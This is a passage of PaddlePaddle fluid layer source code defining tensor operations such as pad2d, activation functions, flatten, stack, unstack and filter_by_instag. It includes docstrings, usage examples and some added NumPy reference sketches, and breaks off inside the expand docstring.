Variable: A Tensor with shape [batch_size, H, W, 2] while 'H' and 'W' are the height and width of feature map in affine transformation. The data type is the same as `theta`.
Raises:
ValueError: If the type of arguments is not supported.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
place = fluid.CPUPlace()
theta = fluid.data(name="x", shape=[None, 2, 3], dtype="float32")
out_shape = fluid.data(name="y", shape=[4], dtype="int32")
grid_0 = fluid.layers.affine_grid(theta, out_shape)
grid_1 = fluid.layers.affine_grid(theta, [5, 3, 28, 28])
batch_size=2
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
output= exe.run(feed={"x": np.random.rand(batch_size,2,3).astype("float32"),
"y": np.array([5, 3, 28, 28]).astype("int32")},
fetch_list=[grid_0.name, grid_1.name])
print(output[0])
print(output[1])
"""
helper = LayerHelper('affine_grid')
if not (isinstance(out_shape, list) or isinstance(out_shape, tuple) or \
isinstance(out_shape, Variable)):
raise ValueError("The out_shape should be a list, tuple or Variable.")
if not isinstance(theta, Variable):
raise ValueError("The theta should be a Variable.")
out = helper.create_variable_for_type_inference(theta.dtype)
ipts = {'Theta': theta}
attrs = {}
if isinstance(out_shape, Variable):
ipts['OutputShape'] = out_shape
else:
attrs['output_shape'] = out_shape
helper.append_op(
type='affine_grid',
inputs=ipts,
outputs={'Output': out},
attrs=None if len(attrs) == 0 else attrs)
return out
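# Illustrative sketch (not part of the original API): one common way to build an
# affine sampling grid in NumPy -- a base grid of normalized (x, y, 1) coordinates
# in [-1, 1] transformed by ``theta``, giving the documented [N, H, W, 2] layout.
# The helper name and the normalization convention are assumptions here.
def _affine_grid_numpy_sketch(theta, out_shape):
    import numpy as np
    theta = np.asarray(theta, dtype=np.float64)  # [N, 2, 3]
    n, _, h, w = out_shape
    assert theta.shape[0] == n
    xs = np.linspace(-1, 1, w)
    ys = np.linspace(-1, 1, h)
    base = np.stack(np.meshgrid(xs, ys) + [np.ones((h, w))], axis=-1)  # [H, W, 3]
    # grid[n, i, j] = theta[n] @ (x, y, 1)
    return np.einsum('nkc,ijc->nijk', theta, base)  # [N, H, W, 2]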
def pad2d(input,
paddings=[0, 0, 0, 0],
mode='constant',
pad_value=0.0,
data_format="NCHW",
name=None):
"""
Pad 2-d images according to 'paddings' and 'mode'.
If mode is 'reflect', paddings[0] and paddings[1] must be no greater
than height-1, and paddings[2] and paddings[3] must be no greater than width-1.
Parameters:
input (Variable): The input image with [N, C, H, W] format or [N, H, W, C] format, which is a 4-D Tensor with data type float32.
paddings (Variable | List[int32]): The padding size. If padding is a List, it must
contain four integers, (padding_top, padding_bottom, padding_left, padding_right).
Otherwise, it is a 1-D Tensor with shape [4]. Data type is int32.
Default is [0, 0, 0, 0].
mode (str): Three modes: 'constant' (default), 'reflect', 'edge' .
When in 'constant' mode, this op uses a constant value to pad the input tensor.
When in 'reflect' mode, uses reflection of the input boundaries to pad the input tensor.
When in 'edge' mode, uses input boundaries to pad the input tensor.
Default is 'constant'
pad_value (float32): The value to fill the padded areas in 'constant' mode. Default is 0.0
data_format (str): A string from: "NHWC", "NCHW". Specify the data format of
the input data.
Default is "NCHW"
name (str, optional) : The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns: a 4-D Tensor padded according to paddings and mode and data type is same as input.
Return Type: Variable
Examples:
.. code-block:: text
Input = [[[[1., 2., 3.],
[4., 5., 6.]]]]
Case 0:
paddings = [0, 1, 2, 3],
mode = 'constant'
pad_value = 0
Out = [[[[0., 0., 1., 2., 3., 0., 0., 0.],
[0., 0., 4., 5., 6., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.]]]]
Case 1:
paddings = [0, 1, 2, 1],
mode = 'reflect'
Out = [[[[3., 2., 1., 2., 3., 2.],
[6., 5., 4., 5., 6., 5.],
[3., 2., 1., 2., 3., 2.]]]]
Case 2:
paddings = [0, 1, 2, 1],
mode = 'edge'
Out = [[[[1., 1., 1., 2., 3., 3.],
[4., 4., 4., 5., 6., 6.],
[4., 4., 4., 5., 6., 6.]]]]
Code Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
result = fluid.layers.pad2d(input=data, paddings=[0, 1, 2, 3], mode='reflect')
"""
if in_dygraph_mode():
_paddings = paddings.numpy().tolist() if isinstance(
paddings, Variable) else paddings
return core.ops.pad2d(input, 'mode', mode, 'pad_value', pad_value,
'data_format', data_format, 'paddings', _paddings)
attrs = {'mode': mode, 'pad_value': pad_value, 'data_format': data_format}
inputs = {'X': [input]}
if isinstance(paddings, Variable):
inputs['Paddings'] = [paddings]
attrs['paddings'] = []
else:
attrs['paddings'] = paddings
helper = LayerHelper('pad2d', **locals())
assert mode in ['reflect', 'edge', 'constant'
], "mode should be one of constant, reflect, edge."
dtype = helper.input_dtype(input_param_name='input')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='pad2d', inputs=inputs, outputs={"Out": out}, attrs=attrs)
return out
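# Illustrative sketch (not part of the original API): the three pad2d modes map
# onto ``numpy.pad`` mode names, which reproduces Case 0-2 above for NCHW input.
# The helper name is an assumption for illustration only.
def _pad2d_numpy_sketch(x, paddings, mode='constant', pad_value=0.0):
    import numpy as np
    top, bottom, left, right = paddings
    pad_width = [(0, 0), (0, 0), (top, bottom), (left, right)]
    if mode == 'constant':
        return np.pad(x, pad_width, mode='constant', constant_values=pad_value)
    # numpy's 'reflect' and 'edge' match the behaviour shown in Case 1 and Case 2.
    return np.pad(x, pad_width, mode=mode)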
@templatedoc()
def elu(x, alpha=1.0, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
alpha(${alpha_type}|1.0): ${alpha_comment}
name(str|None): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`.
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
input_elu = np.array([[-1,6],[1,15.6]])
with fluid.dygraph.guard():
x = fluid.dygraph.to_variable(input_elu)
y = fluid.layers.elu(x, alpha=0.2)
print(y.numpy())
# [[-0.12642411 6. ]
# [ 1. 15.6 ]]
"""
helper = LayerHelper('elu', **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'elu')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='elu',
inputs={'X': x},
outputs={'Out': out},
attrs={'alpha': alpha})
return out
@templatedoc()
def relu6(x, threshold=6.0, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
threshold(float, optional): ${threshold_comment}
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
output(${out_type}): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
in1 = np.array([[-1,0],[2.5,7.8]])
with fluid.dygraph.guard():
x1 = fluid.dygraph.to_variable(in1)
out1 = fluid.layers.relu6(x=x1, threshold=6.0)
print(out1.numpy())
# [[0. 0. ]
# [2.5 6. ]]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'relu6')
helper = LayerHelper('relu6', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='relu6',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
@templatedoc()
def pow(x, factor=1.0, name=None):
"""
This is Pow Activation Operator.
:math:`out = x^{factor}`
Args:
x(Variable): A ``Tensor`` or ``LoDTensor`` . The data type is ``float32`` or ``float64``.
factor(float32|Variable, optional): A scalar with type ``float32`` or a ``Tensor`` with shape [1] and type ``float32``. The exponential factor of Pow. Default 1.0.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: A ``Tensor`` or ``LoDTensor``. The data type is same as ``x``.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="x", shape=[32,32], dtype="float32")
# example 1: argument factor is float
y_1 = fluid.layers.pow(x, factor=2.0)
# y_1 is x^{2.0}
# example 2: argument factor is Variable
factor_tensor = fluid.layers.fill_constant([1], "float32", 3.0)
y_2 = fluid.layers.pow(x, factor=factor_tensor)
# y_2 is x^{3.0}
"""
check_variable_and_dtype(x, 'x', ['int32', 'int64', 'float32', 'float64'],
'pow')
helper = LayerHelper('pow', **locals())
inputs = {'X': x}
attrs = {}
if isinstance(factor, Variable):
check_variable_and_dtype(factor, 'factor', ['float32'], 'pow')
factor.stop_gradient = True
inputs['FactorTensor'] = factor
else:
attrs['factor'] = factor
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='pow', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
@templatedoc()
def stanh(x, scale_a=0.67, scale_b=1.7159, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
scale_a(${scale_a_type}|2.0 / 3.0): ${scale_a_comment}
scale_b(${scale_b_type}|1.7159): ${scale_b_comment}
name(str|None): A name for this layer(optional). If set None, the layer
will be named automatically.
Returns:
output(${out_type}): ${out_comment}.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(name="input", shape=[-1, 3])
result = fluid.layers.stanh(data,scale_a=0.67, scale_b=1.72)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
x = np.random.random(size=(3, 3)).astype('float32')
output= exe.run(feed={"input": x},
fetch_list=[result])
print(output)
#[array([[0.626466 , 0.89842904, 0.7501062 ],
# [0.25147712, 0.7484996 , 0.22902708],
# [0.62705994, 0.23110689, 0.56902856]], dtype=float32)]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'stanh')
helper = LayerHelper('stanh', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='stanh',
inputs={'X': x},
outputs={'Out': out},
attrs={'scale_a': scale_a,
'scale_b': scale_b})
return out
@templatedoc()
def hard_sigmoid(x, slope=0.2, offset=0.5, name=None):
"""
${comment}
Parameters:
x (${x_type}): ${x_comment}
slope (float, optional): ${slope_comment}
offset (float, optional): ${offset_comment}
name (str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.fill_constant(shape=[3, 2], value=0.5, dtype='float32') # [[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]]
result = fluid.layers.hard_sigmoid(data) # [[0.6, 0.6], [0.6, 0.6], [0.6, 0.6]]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hard_sigmoid')
helper = LayerHelper('hard_sigmoid', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='hard_sigmoid',
inputs={'X': x},
outputs={'Out': out},
attrs={'slope': slope,
'offset': offset})
return out
@templatedoc()
def swish(x, beta=1.0, name=None):
"""
Elementwise swish activation function. See `Searching for Activation Functions <https://arxiv.org/abs/1710.05941>`_ for more details.
Equation:
.. math::
out = \\frac{x}{1 + e^{- beta * x}}
Args:
x(Variable): Tensor or LoDTensor, dtype: float32 or float64, the input of swish activation.
beta(float): Constant beta of swish operator, default 1.0.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`.
Returns:
Variable: Output of the swish activation, Tensor or LoDTensor, with the same dtype and shape with the input x.
Examples:
.. code-block:: python
# declarative mode
import numpy as np
from paddle import fluid
x = fluid.data(name="x", shape=(-1, 3), dtype="float32")
y = fluid.layers.swish(x, beta=2.0)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
start = fluid.default_startup_program()
main = fluid.default_main_program()
data = np.random.randn(2, 3).astype("float32")
exe.run(start)
y_np, = exe.run(main, feed={"x": data}, fetch_list=[y])
data
# array([[-1.1239197 , 1.3391294 , 0.03921051],
# [ 1.1970421 , 0.02440812, 1.2055548 ]], dtype=float32)
y_np
# array([[-0.2756806 , 1.0610548 , 0.01998957],
# [ 0.9193261 , 0.01235299, 0.9276883 ]], dtype=float32)
.. code-block:: python
# imperative mode
import numpy as np
from paddle import fluid
import paddle.fluid.dygraph as dg
data = np.random.randn(2, 3).astype("float32")
place = fluid.CPUPlace()
with dg.guard(place) as g:
x = dg.to_variable(data)
y = fluid.layers.swish(x)
y_np = y.numpy()
data
# array([[-0.0816701 , 1.1603649 , -0.88325626],
# [ 0.7522361 , 1.0978601 , 0.12987892]], dtype=float32)
y_np
# array([[-0.03916847, 0.8835007 , -0.25835553],
# [ 0.51126915, 0.82324016, 0.06915068]], dtype=float32)
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'swish')
helper = LayerHelper('swish', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='swish',
inputs={'X': x},
outputs={'Out': out},
attrs={'beta': beta})
return out
def prelu(x, mode, param_attr=None, name=None):
"""
Equation:
.. math::
y = \max(0, x) + \\alpha * \min(0, x)
There are three modes for the activation:
.. code-block:: text
all: All elements share same alpha.
channel: Elements in same channel share same alpha.
element: All elements do not share alpha. Each element has its own alpha.
Args:
x (Variable): The input Tensor or LoDTensor with data type float32.
mode (str): The mode for weight sharing.
param_attr(ParamAttr|None): The parameter attribute for the learnable
weight (alpha); it can be created by ParamAttr. None by default.
For detailed information, please refer to :ref:`api_fluid_ParamAttr`.
name(str|None): For detailed information, please refer
to :ref:`api_guide_Name`. Usually there is no need to set this name, and it
is None by default.
Returns:
Variable:
output(Variable): The tensor or LoDTensor with the same shape as input.
The data type is float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
from paddle.fluid.param_attr import ParamAttr
x = fluid.data(name="x", shape=[None,5,10,10], dtype="float32")
mode = 'channel'
output = fluid.layers.prelu(
x,mode,param_attr=ParamAttr(name='alpha'))
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'prelu')
helper = LayerHelper('prelu', **locals())
if mode not in ['all', 'channel', 'element']:
raise ValueError('mode should be one of all, channel, element.')
alpha_shape = [1]
if mode == 'channel':
alpha_shape = [1, x.shape[1], 1, 1]
elif mode == 'element':
alpha_shape = [1, x.shape[1], x.shape[2], x.shape[3]]
dtype = helper.input_dtype(input_param_name='x')
alpha = helper.create_parameter(
attr=helper.param_attr,
shape=alpha_shape,
dtype='float32',
is_bias=False,
default_initializer=Constant(0.25))
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="prelu",
inputs={"X": x,
'Alpha': alpha},
attrs={"mode": mode},
outputs={"Out": out})
return out
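# Illustrative sketch (not part of the original API): the PReLU equation from the
# docstring written directly in NumPy. ``alpha`` is broadcast exactly as the three
# weight-sharing modes shape it ([1], [1, C, 1, 1], or one value per element).
def _prelu_numpy_sketch(x, alpha):
    import numpy as np
    x = np.asarray(x, dtype=np.float32)
    alpha = np.asarray(alpha, dtype=np.float32)
    return np.maximum(0, x) + alpha * np.minimum(0, x)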
@templatedoc()
def brelu(x, t_min=0.0, t_max=24.0, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
t_min(${t_min_type}|0.0): ${t_min_comment}
t_max(${t_max_type}|24.0): ${t_max_comment}
name(str|None): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`.
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
input_brelu = np.array([[-1,6],[1,15.6]])
with fluid.dygraph.guard():
x = fluid.dygraph.to_variable(input_brelu)
y = fluid.layers.brelu(x, t_min=1.0, t_max=10.0)
print(y.numpy())
#[[ 1. 6.]
#[ 1. 10.]]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'brelu')
helper = LayerHelper('brelu', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='brelu',
inputs={'X': x},
outputs={'Out': out},
attrs={'t_min': t_min,
't_max': t_max})
return out
@templatedoc()
def leaky_relu(x, alpha=0.02, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
alpha(${alpha_type}|0.02): ${alpha_comment}
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
output(${out_type}): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph Organizing
x = fluid.layers.data(name="x", shape=[2], dtype="float32")
res = fluid.layers.leaky_relu(x, alpha=0.1)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[-1, 2], [3, -4]]).astype(np.float32)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i}, fetch_list=[res])
print(res_val) # [[-0.1, 2], [3, -0.4]]
"""
if in_dygraph_mode():
return core.ops.leaky_relu(x, 'alpha', alpha)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'leaky_relu')
inputs = {'X': [x]}
attrs = {'alpha': alpha}
helper = LayerHelper('leaky_relu', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='leaky_relu', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def soft_relu(x, threshold=40.0, name=None):
"""
SoftRelu Activation Operator.
$out = \ln(1 + \exp(\max(\min(x, threshold), -threshold)))$
Args:
x(Variable): Input of soft_relu operator. Data type can be float32, float64.
threshold(float, optional): The threshold value of soft_relu, default value being 40.0.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable(Tensor|LoDTensor): Output of soft_relu operator, shape and LoD same as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[2, 2], dtype="float32")
output = fluid.layers.soft_relu(inputs, threshold=20.0)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img = np.array([[0, 1],[2, 3]]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img}, fetch_list=[output])
print(res) # [array([[0.6931472, 1.3132616], [2.126928 , 3.0485873]], dtype=float32)]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'soft_relu')
helper = LayerHelper('soft_relu', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='soft_relu',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
def flatten(x, axis=1, name=None):
"""
**Flatten op**
Flatten the input tensor into a 2D matrix.
For Example:
.. code-block:: text
Case 1:
Given
X.shape = (3, 100, 100, 4)
and
axis = 2
We get:
Out.shape = (3 * 100, 4 * 100)
Case 2:
Given
X.shape = (3, 100, 100, 4)
and
axis = 0
We get:
Out.shape = (1, 3 * 100 * 100 * 4)
Args:
x (Variable): A tensor of rank >= axis. A tensor with type float32,
float64, int8, int32, int64.
axis (int): Indicate up to which input dimensions (exclusive) should
be flattened to the outer dimension of the output.
The value for axis must be in the range [0, R], where R
is the rank of the input tensor. Default: 1.
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Variable: A 2D tensor with the contents of the input tensor, with input \
dimensions up to axis flattened to the outer dimension of \
the output and remaining input dimensions flattened into the \
inner dimension of the output. A Tensor with type same as input x.
Raises:
ValueError: If x is not a variable.
ValueError: If axis is not in range [0, rank(x)].
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="x", shape=[4, 4, 3], dtype="float32")
# x shape is [4, 4, 3]
out = fluid.layers.flatten(x=x, axis=2)
# out shape is [16, 3]
"""
helper = LayerHelper('flatten', **locals())
if not (isinstance(x, Variable)):
raise ValueError("The input x should be a Variable")
if not (isinstance(axis, int)) or axis > len(x.shape) or axis < 0:
raise ValueError("The axis should be a int, and in range [0, rank(x)]")
out = helper.create_variable_for_type_inference(x.dtype)
x_shape = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='flatten2',
inputs={"X": x},
outputs={'Out': out,
'XShape': x_shape},
attrs={"axis": axis})
return out
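# Illustrative sketch (not part of the original API): flatten with a given axis is
# a reshape that multiplies the leading ``axis`` dimensions together and collapses
# the rest, as in Case 1/2 above. The helper name is an assumption.
def _flatten_numpy_sketch(x, axis=1):
    import numpy as np
    x = np.asarray(x)
    outer = int(np.prod(x.shape[:axis])) if axis > 0 else 1
    return x.reshape(outer, -1)
# e.g. _flatten_numpy_sketch(np.zeros((3, 100, 100, 4)), axis=2).shape == (300, 400)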
def stack(x, axis=0):
"""
This OP stacks all the inputs :code:`x` along axis.
.. code-block:: text
Case 1:
Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 0
Output:
Out.dims = [3, 1, 2]
Out.data =[ [ [1.0, 2.0] ],
[ [3.0, 4.0] ],
[ [5.0, 6.0] ] ]
Case 2:
Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 1 or axis = -2
Output:
Out.shape = [1, 3, 2]
Out.data =[ [ [1.0, 2.0]
[3.0, 4.0]
[5.0, 6.0] ] ]
Args:
x (Variable|list(Variable)): Input :code:`x` can be a single Tensor, a :code:`list` of Tensors.
If :code:`x` is a :code:`list`, the shapes of all these Tensors
must be the same. Supposing input is N dims
Tensors :math:`[d_0, d_1, ..., d_{n-1}]`, the output is N+1 dims
Tensor :math:`[d_0, d_1, ..., d_{axis-1}, len(x), d_{axis}, ..., d_{n-1}]`.
Support data types: float32, float64, int32, int64.
axis (int, optional): The axis along which all inputs are stacked. ``axis`` range is :math:`[-(R+1), R+1)`.
R is the rank of the first tensor among the inputs. If ``axis`` < 0, :math:`axis=axis+rank(x[0])+1`.
The default value of axis is 0.
Returns:
Variable: The stacked Tensor, has same data type with input Tensors. Output dim is :math:`rank(x[0])+1`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
# set batch size=None
x1 = fluid.data(name='x1', shape=[None, 1, 2], dtype='int32')
x2 = fluid.data(name='x2', shape=[None, 1, 2], dtype='int32')
# stack Tensor list
data = layers.stack([x1,x2]) # stack according to axis 0, data.shape=[2, None, 1, 2]
data = layers.stack([x1,x2], axis=1) # stack according to axis 1, data.shape=[None, 2, 1, 2]
# stack single Tensor
data = layers.stack(x1) # stack according to axis 0, data.shape=[1, None, 1, 2]
"""
helper = LayerHelper('stack', **locals())
axis = 0 if axis is None else axis
if not isinstance(x, list) and not isinstance(x, tuple):
x = [x]
out = helper.create_variable_for_type_inference(x[0].dtype)
if not in_dygraph_mode() and \
x[0].desc.type() == core.VarDesc.VarType.LOD_TENSOR_ARRAY:
assert len(x) == 1, "If the elements of 'x' in stack are Variable(LoDTensorArray), " \
"number of the elements must be 1, but received %s." % len(x)
out_index = helper.create_variable_for_type_inference(dtype="int32")
helper.append_op(
type='tensor_array_to_tensor',
inputs={'X': x[0]},
outputs={'Out': [out],
'OutIndex': [out_index]},
attrs={'axis': axis,
'use_stack': True})
else:
helper.append_op(
type='stack',
inputs={'X': x},
outputs={'Y': out},
attrs={'axis': axis})
return out
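# Illustrative sketch (not part of the original API): for a list of equally shaped
# arrays, the stacking behaviour in Case 1/2 is exactly ``numpy.stack``.
def _stack_numpy_sketch(xs, axis=0):
    import numpy as np
    return np.stack([np.asarray(x) for x in xs], axis=axis)
# e.g. _stack_numpy_sketch([[[1., 2.]], [[3., 4.]], [[5., 6.]]]).shape == (3, 1, 2)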
@templatedoc(op_type="filter_by_instag")
def filter_by_instag(ins, ins_tag, filter_tag, is_lod, out_val_if_empty=0):
"""
**Filter By Instag Layer**
This function filters a batch of ins by instag.
There are multiple ins, and every ins belongs to some tags.
We can specify the tags we want, so the ins which belong to those tags
remain in the output, and the others are removed.
For example, one batch has 4 ins. Every ins has its tag list.
| Ins | Ins_Tag |
|:-----:|:------:|
| 0 | 0, 1 |
| 1 | 1, 3 |
| 2 | 0, 3 |
| 3 | 2, 6 |
And Lod is [1,1,1,1]
And the filter tags [1]
From the definition above, an ins which has tag 1 can pass the filter,
so Ins 0 and Ins 1 pass and appear in the output, while
Ins 2 and Ins 3 cannot pass because they do not have tag 1.
Actually, if is_lod is false, the input is a normal tensor, which is equivalent to a
lod_tensor whose lod is all 1, similar to the example above.
Args:
ins (Variable): Input Variable (LoDTensor), usually it is 2D tensor
And first dimension can have lod info or not.
ins_tag (Variable): Input Variable (LoDTensor), usually it is 1D list
And split them by lod info
filter_tag (Variable): Input Variable (1D Tensor/List), usually it is
list that holds the tags.
is_lod (Bool): Boolean value to indicate ins is lod tensor or not.
out_val_if_empty(Int64): If the output after filtering is empty, this value
will be used to fill the output tensor.
Returns:
Variable: filtered ins (LoDTensor) and loss weight (Tensor)
Examples:
.. code-block:: python
import paddle.fluid.layers as layers
ins = layers.data(name='Ins', shape=[-1,32], lod_level=0, dtype='float64')
ins_tag = layers.data(name='Ins_tag', shape=[-1,16], lod_level=0, dtype='int64')
filter_tag = layers.data(name='Filter_tag', shape=[-1,16], dtype='int64')
out, loss_weight = layers.filter_by_instag(ins, ins_tag, filter_tag, True)
"""
helper = LayerHelper('filter_by_instag', **locals())
out = helper.create_variable_for_type_inference(dtype=ins.dtype)
loss_weight = helper.create_variable_for_type_inference(dtype=np.float64)
mmap = helper.create_variable_for_type_inference(dtype=ins_tag.dtype)
helper.append_op(
type='filter_by_instag',
inputs={'Ins': ins,
'Ins_tag': ins_tag,
'Filter_tag': filter_tag},
outputs={'Out': out,
'LossWeight': loss_weight,
'IndexMap': mmap},
attrs={'is_lod': is_lod,
'out_val_if_empty': out_val_if_empty})
return [out, loss_weight]
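# Illustrative sketch (not part of the original API): the filtering rule from the
# table above in plain Python -- an instance is kept when its tag list intersects
# the filter tags. The helper name and the list-of-lists input format are
# assumptions; the real op additionally returns a loss weight and an index map.
def _filter_by_instag_python_sketch(ins, ins_tags, filter_tags):
    wanted = set(filter_tags)
    kept_idx = [i for i, tags in enumerate(ins_tags) if wanted & set(tags)]
    return [ins[i] for i in kept_idx], kept_idx
# e.g. with ins_tags=[[0, 1], [1, 3], [0, 3], [2, 6]] and filter_tags=[1],
# only instances 0 and 1 are kept, as in the example above.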
def unstack(x, axis=0, num=None):
"""
**UnStack Layer**
This layer unstacks input Tensor :code:`x` into several Tensors along :code:`axis`.
If :code:`axis` < 0, it would be replaced with :code:`axis+rank(x)`.
If :code:`num` is None, it would be inferred from :code:`x.shape[axis]`,
and if :code:`x.shape[axis]` <= 0 or is unknown, :code:`ValueError` is
raised.
Args:
x (Variable): Input Tensor. It is a N-D Tensors of data types float32, float64, int32, int64.
axis (int): The axis along which the input is unstacked.
num (int|None): The number of output variables.
Returns:
list(Variable): The unstacked Tensors list. The list elements are N-D Tensors of data types float32, float64, int32, int64.
Raises:
ValueError: If x.shape[axis] <= 0 or axis is not in range [-D, D).
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[2, 3, 5], dtype='float32') # create a tensor with shape=[2, 3, 5]
y = fluid.layers.unstack(x, axis=1) # unstack with second axis, which results 3 tensors with shape=[2, 5]
"""
helper = LayerHelper('unstack', **locals())
if num is None:
if axis is None or x.shape[axis] <= 0:
raise ValueError('unknown unstack number')
else:
num = x.shape[axis]
outs = []
for _ in range(num):
outs.append(helper.create_variable_for_type_inference(x.dtype))
helper.append_op(
type='unstack',
inputs={'X': [x]},
outputs={'Y': outs},
attrs={'axis': axis,
'num': num})
return outs
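# Illustrative sketch (not part of the original API): unstack is the inverse of
# stack; in NumPy it is a split along ``axis`` followed by squeezing that axis.
def _unstack_numpy_sketch(x, axis=0):
    import numpy as np
    x = np.asarray(x)
    return [np.squeeze(part, axis=axis)
            for part in np.split(x, x.shape[axis], axis=axis)]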
def expand(x, expand_times, name=None):
"""
This operation tiles ``x`` multiple times according to the parameter ``expand_times``.
The times number for each dimension of ``x`` is set by the parameter ``expand_times``.
The rank of ``x`` should be less than or equal to 6. Please note that size of ``expand_times`` must be the same
with X's rank. Following is a using case:
.. code-block:: text
Input(X) is a 3-D tensor with shape [2, 3, 1]:
[
[[1], [2], [3]],
[[4], [5], [6]]
]
Attr(expand_times): [1, 2, 2]
Output(Out) is a 3-D tensor with shape [2, 6, 2]:
[
[[1, 1], [2, 2], [3, 3], [1, 1], [2, 2], [3, 3]],
[[4, 4], [5, 5], [6, 6], [4, 4], [5, 5], [6, 6]]
]
Args:
x (Variable): A ``Tensor`` or ``LoDTensor`` with dimension in [1, 6]. The data type is ``bool``, ``float32``, ``float64`` or ``int32`` .
expand_times (list|tuple|Variable): The data type is ``int32`` . If ``expand_times`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``expand_times`` is a Variable, it should be a 1-D Tensor.
Expand times number for each dimension of ``x`` .
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: A ``Tensor`` or ``LoDTensor``. The data type is same as ``x``. After expanding, size of each dimension of output is equal to the size of the corresponding dimension of ``x`` multiplying the corresponding value given by ``expand_times`` .
Raises:
TypeError: The type of ``expand_times`` must be list, tuple or Variable.
ValueError: The elements of ``expand_times`` cannot be negative.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1:
data_1 = fluid.layers.fill_constant(shape=[2, 3, 1], dtype='int32', value=0)
expanded_1 = fluid.layers.expand(data_1, expand_times=[1, 2, 2])
# the shape of expanded_1 is [2, 6, 2].
# example 2:
